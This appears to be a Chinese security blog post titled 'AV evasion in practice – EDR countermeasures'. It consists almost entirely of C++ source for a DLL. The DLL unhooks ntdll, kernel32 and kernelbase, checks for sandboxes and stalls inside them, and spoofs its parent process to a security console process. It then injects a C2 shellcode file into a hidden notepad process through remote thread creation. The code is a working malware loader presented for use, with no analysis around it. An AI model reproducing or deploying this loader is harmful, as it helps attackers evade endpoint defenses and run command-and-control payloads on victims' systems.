免杀实战-EDR对抗

时间:2024-03-02 20:45:51
// dllmain.cpp : 定义 DLL 应用程序的入口点。 #include "pch.h" #include <Windows.h> #include <TlHelp32.h> #include<stdlib.h> #include<iostream> #include <psapi.h> BOOL EnableDebugPrivilege() { HANDLE token_handle; LUID luid; TOKEN_PRIVILEGES tkp; //打开访问令牌 if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &token_handle)) { return FALSE; } //查询luid if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid)) { CloseHandle(token_handle); return FALSE; } tkp.PrivilegeCount = 1; tkp.Privileges[0].Luid = luid; tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; //调整访问令牌权限 if (!AdjustTokenPrivileges(token_handle, FALSE, &tkp, sizeof(tkp), NULL, NULL)) { CloseHandle(token_handle); return FALSE; } return TRUE; } typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)( PHANDLE ThreadHandle, ACCESS_MASK DesiredAccess, LPVOID ObjectAttributes, HANDLE ProcessHandle, LPTHREAD_START_ROUTINE lpStartAddress, LPVOID lpParameter, ULONG CreateThreadFlags, SIZE_T ZeroBits, SIZE_T StackSize, SIZE_T MaximumStackSize, LPVOID pUnkown ); typedef FARPROC (WINAPI * pGetProcAddress)( _In_ HMODULE hModule, _In_ LPCSTR lpProcName ); typedef HMODULE (WINAPI * pLoadLibraryA)( _In_ LPCSTR lpLibFileName ); int ppidfunc(DWORD pid, LPVOID lpBuffer, DWORD dwFileSize) { PROCESS_INFORMATION pi = { 0 }; STARTUPINFOEXA si = { 0 }; SIZE_T sizeToAllocate; si.StartupInfo.cb = sizeof(STARTUPINFOEXA); //getparenthandle HANDLE parentProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, false, pid); //UpdateProcThreadAttribute InitializeProcThreadAttributeList(NULL, 1, 0, &sizeToAllocate); si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sizeToAllocate); InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &sizeToAllocate); UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &parentProcessHandle, sizeof(HANDLE), NULL, NULL); //CreateProcess CreateProcessA(NULL, (LPSTR)"notepad.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW | EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si.StartupInfo, &pi); LPVOID lpBaseAddress = VirtualAllocEx(pi.hProcess, NULL, dwFileSize, (MEM_RESERVE | MEM_COMMIT), PAGE_EXECUTE_READWRITE); WriteProcessMemory(pi.hProcess, lpBaseAddress, (LPVOID)lpBuffer, dwFileSize, NULL); HANDLE hRemoteThread = NULL; DWORD ZwRet = 0; HMODULE hNtdll = LoadLibrary(L"ntdll.dll"); typedef_ZwCreateThreadEx ZwCreateThreadEx = (typedef_ZwCreateThreadEx)GetProcAddress(hNtdll, "ZwCreateThreadEx"); ZwRet = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, pi.hProcess, (LPTHREAD_START_ROUTINE)lpBaseAddress, NULL, 0, 0, 0, 0, NULL); WaitForSingleObject(hRemoteThread, INFINITE); CloseHandle(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(parentProcessHandle); return 0; } BOOL box() { MEMORYSTATUSEX memoryStatus; memoryStatus.dwLength = sizeof(MEMORYSTATUSEX); GlobalMemoryStatusEx(&memoryStatus); DWORDLONG RAMMB = memoryStatus.ullTotalPhys / 1024 / 1024 / 1024; //内存RAMMB(G) if (RAMMB > 2) { SYSTEM_INFO systemInfo; GetSystemInfo(&systemInfo); DWORD numberOfProcessors = systemInfo.dwNumberOfProcessors; if (numberOfProcessors > 4) return FALSE; } else return TRUE; } BOOL isPrime(long long number) { if (number <= 1) return FALSE; int i = 2; for (; i <= number; ++i) { if (number % i == 0) { return FALSE; } } return TRUE; } DWORD UNHOOKntdll(char* dllname) { MODULEINFO mi = {}; HMODULE ntdllModule = GetModuleHandleA(dllname); GetModuleInformation(HANDLE(-1), ntdllModule, &mi, sizeof(mi)); char nn[100] = { 0 }; LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;//mi.lpBaseOfDll=ntdllModule sprintf_s(nn, "c:\\windows\\system32\\%s", dllname); HANDLE ntdllFile = CreateFileA((LPCSTR)nn, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL); HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL); LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0); PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase; PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew); for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) { PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i)); if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) { DWORD oldProtection = 0; bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection); memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize); isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection); } } CloseHandle(ntdllFile); CloseHandle(ntdllMapping); FreeLibrary(ntdllModule); return 0; } DWORD FindProcPid() { HANDLE hProcessSnap = NULL; BOOL bRet = FALSE; PROCESSENTRY32 pe32 = { 0 }; DWORD dwProcessId = 0; hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); pe32.dwSize = sizeof(PROCESSENTRY32); if (hProcessSnap != INVALID_HANDLE_VALUE) { bRet = Process32First(hProcessSnap, &pe32); while (bRet) { if (!_wcsicmp(pe32.szExeFile, L"EPConsole.exe")) { dwProcessId = pe32.th32ProcessID; break; } bRet = Process32Next(hProcessSnap, &pe32); } } return dwProcessId; } int killme() { char g_TargetFile[] = "c2.bin"; //打开文件 HANDLE hFile = CreateFileA((LPCSTR)g_TargetFile, GENERIC_READ, NULL, NULL, OPEN_EXISTING, 0, NULL); //获取文件大小 DWORD dwFileSize = GetFileSize(hFile, NULL); //申请一块内存空间 PVOID lpBuffer = VirtualAlloc(NULL, dwFileSize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); //将内存读取到申请的内存空间 DWORD dwReadLength = 0; ReadFile(hFile, lpBuffer, dwFileSize, &dwReadLength, NULL); //关闭文件 CloseHandle(hFile); if (box()) { isPrime(1000000000000000003); } else { DWORD pid = FindProcPid(); UNHOOKntdll((char*)"ntdll.dll"); UNHOOKntdll((char*)"kernel32.dll"); UNHOOKntdll((char*)"kernelbase.dll"); //EnableDebugPrivilege();//对于获取system权限的进程而言需要管理员权限启动 ppidfunc(pid, lpBuffer, dwFileSize); } return 0; } extern "C" _declspec(dllexport) void test() { killme(); } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }